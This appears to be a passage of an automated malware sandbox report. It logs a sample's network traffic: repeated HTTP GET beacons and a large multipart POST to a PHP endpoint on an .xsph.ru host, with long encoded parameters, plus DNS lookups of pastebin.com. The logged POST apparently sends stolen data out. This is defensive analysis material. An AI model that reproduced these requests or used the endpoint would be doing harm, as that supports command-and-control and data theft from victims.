JjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=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

Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: f1070307.xsph.ru

Source: unknown

HTTP traffic detected: POST /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryi5BcUS04v1zh5p3RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: f1070307.xsph.ruContent-Length: 96625Expect: 100-continue

